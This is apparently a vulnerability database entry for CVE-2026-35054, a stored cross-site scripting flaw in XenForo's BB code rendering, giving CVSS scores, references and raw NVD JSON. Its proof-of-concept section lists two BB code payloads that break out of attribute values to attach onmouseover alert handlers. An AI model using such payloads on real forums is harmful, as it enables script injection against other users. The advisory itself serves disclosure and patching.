CVE-2026-35054

Description

XenForo before 2.3.9 is vulnerable to stored cross-site scripting (XSS) related to BB code rendering. An attacker can inject malicious scripts through BB code that are stored and executed when other users view the content.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:* - VULNERABLE

XenForo < 2.3.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept for XenForo BB Code Stored XSS
// Attacker inputs the following payload into a post or signature field:

[url=https://example.com' onmouseover='alert(1)']Hover Me[/url]

// Alternatively, exploiting a specific tag attribute handling:
[color=#000000" onmouseover="alert('XSS')]Text[/color]

// Description:
// The payload attempts to break out of the BB code attribute context
// and inject a JavaScript event handler. When rendered, if the BB code parser
// does not sanitize the attribute value correctly, the onmouseover event
// is attached to the resulting HTML element.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35054
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35054
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35054/
[4] VulDB https://vuldb.com/cve/CVE-2026-35054
[5] https://www.vulncheck.com/advisories/xenforo-stored-cross-site-scripting-via-bb-code-rendering
[6] https://xenforo.com/community/threads/xenforo-2-3-9-inc-xfmg-2-2-18-released-security-fix.235659/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35054", "sourceIdentifier": "[email protected]", "published": "2026-04-01T01:16:41.200", "lastModified": "2026-04-01T18:51:19.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XenForo before 2.3.9 is vulnerable to stored cross-site scripting (XSS) related to BB code rendering. An attacker can inject malicious scripts through BB code that are stored and executed when other users view the content."}, {"lang": "es", "value": "XenForo anterior a 2.3.9 es vulnerable a cross-site scripting (XSS) almacenado relacionado con la renderización de código BB. Un atacante puede inyectar scripts maliciosos a través de código BB que se almacenan y ejecutan cuando otros usuarios ven el contenido."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.9", "matchCriteriaId": "301013ED-80B4-44C5-A7B0-717C7AC0B40E"}]}]}], "references": [{"url": "https://www.vulncheck.com/advisories/xenforo-stored-cross-site-scripting-via-bb-code-rendering", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://xenforo.com/community/threads/xenforo-2-3-9-inc-xfmg-2-2-18-released-security-fix.235659/", "source": "[email protected]", "tags": ["Release Notes"]}]}}